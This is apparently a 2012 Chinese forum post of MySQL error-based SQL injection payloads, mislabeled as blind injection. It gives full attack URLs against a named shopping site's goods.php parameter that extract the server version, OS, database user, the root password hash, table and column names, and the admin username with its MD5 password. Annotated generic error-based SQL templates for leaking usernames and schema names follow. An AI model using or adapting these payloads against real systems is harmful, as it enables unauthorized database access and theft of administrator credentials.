
标题: 盲注详细内容

作者: admin    时间: 2012-9-5 14:59
标题: 盲注详细内容
判断版本号（说明：下面所有 payload 都依赖 MySQL 把 concat(要读取的值, floor(rand()*2)) 作为 group by 键时产生的 Duplicate entry 报错，把值带回报错信息——严格说属于报错注入而非布尔/时间盲注；rand() 未加种子时键碰撞并非必然，偶尔需要重试）
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
判断系统
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

当前 user()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
root hash（读取 mysql.user 表，需要当前数据库账号对 mysql.user 有 SELECT 权限，普通应用账号通常没有）

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23


当前 数据库表名（char(115,97,110,115,97,110,49) 即 'sansan1'；limit 6,1 取第 7 张表，改偏移量逐一枚举）
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

当前 数据库 user_name 字段（TABLE_NAME=char(...) 即 'ecs_admin_user'；limit 2,1 取第 3 列，调整偏移量逐列枚举）

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

当前 数据库 字段 password（同上，limit 4,1 取第 5 列）
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
获得 admin passwd(md5)（从 sansan1.ecs_admin_user 取 password 与 user_name，用 char(94) 即 '^' 连接，ifnull 防止 NULL 让 concat 整体变 NULL）
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

报错注射
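-- Error-based ("报错注射") extraction via MySQL's GROUP BY duplicate-key trick.
-- Each payload builds a grouping key x = concat(<leaked value>, floor(rand(0)*2))
-- over a multi-row source (information_schema.tables); the key collision makes
-- MySQL abort with a Duplicate entry error whose text contains <leaked value>.
-- The data comes back in the error message, not through a boolean or timing
-- side channel, so this is error-based rather than blind injection.
-- NOTE(review): rand(0) is seeded, so the key sequence repeats on every run and
-- the collision is reproducible given enough source rows; the URL payloads
-- earlier on this page use unseeded rand() and may need a retry.

-- 1. Leak the server version. The host query is the application's own
--    statement; the UNION branch must match its column count (two columns are
--    assumed here: the literal 1 and the error-raising subquery).
SELECT *
FROM table_name
WHERE uid = -1
UNION
SELECT
    1,
    (SELECT 1
     FROM (
         SELECT
             count(*),
             concat(
                 (SELECT (SELECT version()) FROM information_schema.tables LIMIT 0,1),
                 floor(rand(0)*2)
             ) x
         FROM information_schema.tables
         GROUP BY x
         LIMIT 0,1
     ) a);

-- 2. Same skeleton, leaking the first username from admin_table. Step the
--    inner LIMIT offset (LIMIT 1,1, LIMIT 2,1, ...) to walk the table.
SELECT *
FROM table_name
WHERE uid = -1
UNION
SELECT
    1,
    (SELECT 1
     FROM (
         SELECT
             count(*),
             concat(
                 (SELECT (SELECT username FROM admin_table LIMIT 0,1) FROM information_schema.tables LIMIT 0,1),
                 floor(rand(0)*2)
             ) x
         FROM information_schema.tables
         GROUP BY x
         LIMIT 0,1
     ) a);

-- 3. Fragment form: appended to an injectable condition ("... and(...)") rather
--    than a UNION, so no column count has to match. 0x7e and 0x27 are the hex
--    literals for '~' and the single quote, wrapping SCHEMA_NAME so it is easy
--    to pick out of the error text; LIMIT 21,1 selects the 22nd schema — step
--    the offset to enumerate. Unlike 1 and 2 there is no LIMIT on the GROUP BY
--    query.
and(SELECT 1
    FROM (
        SELECT
            count(*),
            concat(
                (SELECT (SELECT (SELECT concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1)) FROM information_schema.tables LIMIT 0,1),
                floor(rand(0)*2)
            ) x
        FROM information_schema.tables
        GROUP BY x
    ) a)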



